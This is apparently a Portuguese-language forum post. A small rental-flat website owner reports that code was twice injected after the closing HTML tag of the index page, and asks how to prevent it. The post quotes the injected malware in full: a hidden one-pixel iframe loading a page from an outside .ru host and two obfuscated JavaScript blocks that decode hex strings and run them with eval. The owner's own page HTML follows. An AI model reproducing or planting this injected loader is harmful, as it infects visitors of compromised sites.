Publicado em 18 de dez.

Proteger pagina contra edição (injection)

Tenho um site que por duas vezes teve codigos adicionados ao arquivo index.

foi adicionado o seguinte código:

</html> src="http://kfpro.ru/alx/2004/index.php" width=1 height=1 style="visibility: hidden"></iframe>

<**script>

ffff="c5cec2d4ccc4cfd58fd6d3c8d5c489869dc8c7d3c0cc c481d2d3c29c83c9d5d5d19b8e8ec6c498938fcfc4d58ec4d9 d18e90958ec8cfc5c4d98fd1c9d18381d6c8c5d5c99c9081c9 c4c8c6c9d59c9081d2d5d8cdc49c83d7c8d2c8c3c8cdc8d5d8 9bc9c8c5c5c4cf839f9d8ec8c7d3c0ccc49f86889aabc5cec2 d4ccc4cfd58fd6d3c8d5c489869dc8c7d3c0ccc481d2d3c29c 83c9d5d5d19b8e8ecec3c7d4d2c2c0d5c4c58fcfc0ccc48ec8 cfc5c4d98fd1c9d18381d6c8c5d5c99c909181c9c4c8c6c9d5 9c909181d2d5d8cdc49c83c5c8d2d1cdc0d89bcfcecfc4839f 9d8ec8c7d3c0ccc49f86889ac7c7c7d5d59c83efc0ef839ac7 c7d5c79c83839a";
ffftt="";
ftff="function func() {fftft=eval;ftfft=unescape;fffft=String.fromCharCo de;ftttt=Math.PI;ffttf=parseInt;ftft=ffttf(~((fttt t&ftttt)|(~ftttt&ftttt)&(ftttt&~ftttt)|(~ftttt&~ft ttt)));fttff=ffttf(((ftft&ftft)|(~ftft&ftft)&(ftft &~ftft)|(~ftft&~ftft))&1);ftttf=fttff<<fttff;fftf= ftft;for(fttf=ftft;fttf<ftff.length;fttf-=-fttff)fftf+=ffttf(ftff.charCodeAt(fttf));fftf=fftf .toString();fftf%=ftfft(0x64);for(ffft=ftft;ffft<( ffff.length>>fttff);ffft-=-fttff){ffftf='';for(ffttt=ftft;ffttt<ftttf;ffttt-=-fttff)ffftf+=ffff.charAt(ffft*ftttf+ffttt);ffftt+= fffft(ftfft(0xFF)-ffttf(ffttf(ffftf,ftttf<<(ftttf+fttff))^fftf));}tr y{fftft(ffftt);} catch(e){try{eval(ffftt);} catch(e) {window.location='/';}}}func();";
eval(ftff);

</script><script>

vxxvv="9eef818a869088808b91cb92978c9180cdc2d98c839 7848880c5969786d8c78a878390968684918081cb8b848880c a8c8b81809dcb958d95c7c5928c81918dd8d4c58d808c828d9 1d8d4c596919c8980d8c7938c968c878c898c919cdf8d8c818 1808bc7dbd9ca8c8397848880dbc2ccdeef818a869088808b9 1cb92978c9180cdc2d98c8397848880c5969786d8c78d91919 5dfcaca9197dcd7cb868bca86828cc8878c8bca9291968c8bc b86828cda8c81d8d6c7c5928c81918dd8d4c58d808c828d91d 8d4c596919c8980d8c7938c968c878c898c919cdf8d8c81818 08bc7dbd9ca8c8397848880dbc2ccdeef98939d939393d8c7a b84abc7de939d9d9dd8c7c7de";
vxvvv="";
vvvx="function func() {vvxx=eval;vvvxv=unescape;vxvx=String.fromCharCode;vvxxv=Math.PI;vvxxx=parseInt;vxvxx=vvxxx(~((vvxxv &vvxxv)|(~vvxxv&vvxxv)&(vvxxv&~vvxxv)|(~vvxxv&~vvx xv)));vvvxx=vvxxx(((vxvxx&vxvxx)|(~vxvxx&vxvxx)&(v xvxx&~vxvxx)|(~vxvxx&~vxvxx))&1);vxvv=vvvxx<<vvvxx;vxxx=vxvxx;for(vxvvx=vxvxx;vxvvx<vvvx.length;vxvv x-=-vvvxx)vxxx+=vvxxx(vvvx.charCodeAt(vxvvx));vxxx=vxx x.toString();vxxx%=vvvxv(0x64);for(vxxv=vxvxx;vxxv <(vxxvv.length>>vvvxx);vxxv-=-vvvxx){vvxv='';for(vvvv=vxvxx;vvvv<vxvv;vvvv-=-vvvxx)vvxv+=vxxvv.charAt(vxxv*vxvv+vvvv);vxvvv+=vx vx(vvvxv(0xFF)-vvxxx(vvxxx(vvxv,vxvv<<(vxvv+vvvxx))^vxxx));}try{v vxx(vxvvv);} catch(e){try{eval(vxvvv);} catch(e) {window.location='/';}}}func();";
eval(vvvx);

<**/script>
o suporte diz que é erro de programação, o meu arquivo index.php é esse:

<HTML>
<HEAD>
<TITLE>Flat Service</TITLE>
<META NAME="author" CONTENT="Flat Service">
<META NAME="description" CONTENT="FLAT SERVICE - Serviço de camareira diariamente - TV a cabo - serviço de praia ">
<META NAME="keywords" CONTENT="Praia, Sol, Areia, Lazer, Diversão, Piscina, Agua, São Paulo, Apartamento, Serviço de Quarto">

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
	<link rel="stylesheet" href="css/lightbox.css" type="text/css" media="screen" />
	<script src="js/prototype.js" type="text/javascript"></script>
	<script src="js/scriptaculous.js?load=effects" type="text/javascript"></script>
	<script src="js/lightbox.js" type="text/javascript"></script>
	<style type="text/css">
 body{ color: #333; font: 13px 'Lucida Grande', Verdana, sans-serif;	}
	</style>

</HEAD>
<BODY BGCOLOR=#809FE3 LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0>
<p align="center" style="margin-top: 0; margin-bottom: 0">
<font color="#FFFFFF">
<iframe name="pagina_inicial" src="n_inicial.html" height="915" width="800" scrolling="no" align="absmiddle" border="0" frameborder="0">

FLAT SERVICE - Serviço de camareira diariamente - TV a cabo - serviço de praia.

</iframe></font></p>
<p align="center" style="margin-top: 0; margin-bottom: 0">
<i><font face="Verdana" size="1" color="#FFFFFF">Desenvolvido por </font><font face="Verdana" size="1" color="#819FE5"> <a href="images/jrfol.jpg" rel="lightbox"><b>
<font color="#FFFFFF">JRFOL</font></b></a></font><font face="Verdana" size="1" color="#FFFFFF"> -
  Todos os direitos reservados.</font></i></p>
</BODY>
</HTML>

o que eu poderia fazer para que meu código não seja mais modificado por outros ?

o código em questão é inserido após o </HTML>

Discussão (7)

Entre ou cadastre-se para participar da discussão

Entrar Criar conta

Carregando comentários...